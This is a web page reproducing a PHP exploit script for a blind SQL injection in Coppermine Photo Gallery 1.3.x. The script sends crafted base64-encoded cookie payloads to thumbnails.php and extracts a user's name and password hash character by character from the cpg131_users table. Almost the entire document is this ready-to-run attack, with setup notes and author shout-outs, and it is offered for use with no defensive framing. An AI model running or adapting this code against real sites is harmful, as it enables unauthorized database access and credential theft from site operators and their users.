Coppermine Photo Gallery 1.3.x Remote Blind SQL Injection Exploit

                                                <?
#&nbsp;Coppermine&nbsp;Photo&nbsp;Gallery&nbsp;1.3.x&nbsp;Blind&nbsp;SQL&nbsp;Injection&nbsp;Exploit
#&nbsp;by&nbsp;s0cratex,&nbsp;RTM&nbsp;Member
#&nbsp;Visit:&nbsp;www.zonartm.org

/*
You&nbsp;need&nbsp;make&nbsp;a&nbsp;small&nbsp;work...&nbsp;Add&nbsp;a&nbsp;fav&nbsp;pic,&nbsp;enter&nbsp;to&nbsp;the&nbsp;site&nbsp;and&nbsp;add
/addfav.php?pid=2&nbsp;for&nbsp;example..xD
...&nbsp;in&nbsp;the&nbsp;line:&nbsp;if(eregi(\"download\",fgets($cnx2))){&nbsp;$pass.=chr($i);&nbsp;echo
chr($i);&nbsp;break;&nbsp;}&nbsp;&nbsp;}
the&nbsp;word&nbsp;\"download\"&nbsp;depends&nbsp;of&nbsp;the&nbsp;language...
*/

#&nbsp;saludos&nbsp;a&nbsp;rgod,&nbsp;OpTix,&nbsp;crypkey&nbsp;\'n&nbsp;mechas...

error_reporting(0);
ini_set(\"max_execution_time\",0);
ini_set(\"default_socket_timeout\",5);

$host&nbsp;=&nbsp;\"localhost\";&nbsp;$path&nbsp;=&nbsp;\"/cpg\";&nbsp;$port&nbsp;=&nbsp;\"80\";
$id&nbsp;=&nbsp;\"1\";

echo&nbsp;\"Coppermine&nbsp;Photo&nbsp;Gallery&nbsp;1.3.x&nbsp;fav&nbsp;Blind&nbsp;SQL&nbsp;Injection&nbsp;Exploit
\";
echo&nbsp;\"--------------------------------------------------------------
\";
echo&nbsp;\"
\";
echo&nbsp;\"Username&nbsp;->&nbsp;\";
$j&nbsp;=&nbsp;1;&nbsp;$user&nbsp;=&nbsp;\"\";
while(!strstr($user,chr(0))){
for($x=0;$x<255;$x++){
$xpl&nbsp;=&nbsp;\"\'\')&nbsp;OR&nbsp;1=(SELECT&nbsp;(IF((ASCII(SUBSTRING(user_name,\".$j.\",1))=\".$x.\"),1,0))&nbsp;FROM&nbsp;cpg131_users&nbsp;WHERE&nbsp;user_id=\".$id.\")/*\";
$xpl&nbsp;=&nbsp;\"a:1:{i:0;s:\".strlen($xpl).\":\"\".$xpl.\"\";}\";
$xpl&nbsp;=&nbsp;base64_encode($xpl);
$cnx&nbsp;=&nbsp;fsockopen($host,$port);
fwrite($cnx,&nbsp;\"GET&nbsp;\".$path.\"/thumbnails.php?album=favpics&nbsp;HTTP/1.0
Cookie:&nbsp;cpg131_fav=\".$xpl.\"

\");
while(!feof($cnx)){
if(eregi(\"download\",fgets($cnx))){&nbsp;$user.=chr($x);&nbsp;echo&nbsp;chr($x);&nbsp;break;&nbsp;}&nbsp;&nbsp;}
fclose($cnx);
if&nbsp;($x==255)&nbsp;{
die(\"
&nbsp;Try&nbsp;again...\");&nbsp;}
}
$j++;
}
echo&nbsp;\"
\";
echo&nbsp;\"Password&nbsp;->&nbsp;\";
$a&nbsp;=&nbsp;1;&nbsp;$pass&nbsp;=&nbsp;\"\";
while(!strstr($pass,chr(0))){
for($i=0;$i<255;$i++){
$xpl&nbsp;=&nbsp;\"\'\')&nbsp;OR&nbsp;1=(SELECT&nbsp;(IF((ASCII(SUBSTRING(user_password,\".$a.\",1))=\".$i.\"),1,0))&nbsp;FROM&nbsp;cpg131_users&nbsp;WHERE&nbsp;user_id=\".$id.\")/*\";
$xpl&nbsp;=&nbsp;\"a:1:{i:0;s:\".strlen($xpl).\":\"\".$xpl.\"\";}\";
$xpl&nbsp;=&nbsp;base64_encode($xpl);
$cnx2&nbsp;=&nbsp;fsockopen($host,$port);
fwrite($cnx2,&nbsp;\"GET&nbsp;\".$path.\"/thumbnails.php?album=favpics&nbsp;HTTP/1.0
Cookie:&nbsp;cpg131_fav=\".$xpl.\"

\");
while(!feof($cnx2)){
if(eregi(\"download\",fgets($cnx2))){&nbsp;$pass.=chr($i);&nbsp;echo&nbsp;chr($i);&nbsp;break;&nbsp;}
}
fclose($cnx2);
if&nbsp;($i==255)&nbsp;{
die(\"
&nbsp;Try&nbsp;again...\");&nbsp;}
}
$a++;
}
echo&nbsp;\"--------------------------------------------------------------
\";
echo&nbsp;\"[email protected]&nbsp;||&nbsp;if&nbsp;you&nbsp;speak&nbsp;spanish->MSN:&nbsp;[email protected]&nbsp;..xD
\";
echo&nbsp;\"www.zonartm.org/blog/s0cratex
\";
echo&nbsp;\"plexinium.com&nbsp;comming&nbsp;soon&nbsp;<-&nbsp;Hacking&nbsp;Nica
\";
?>

&nbsp;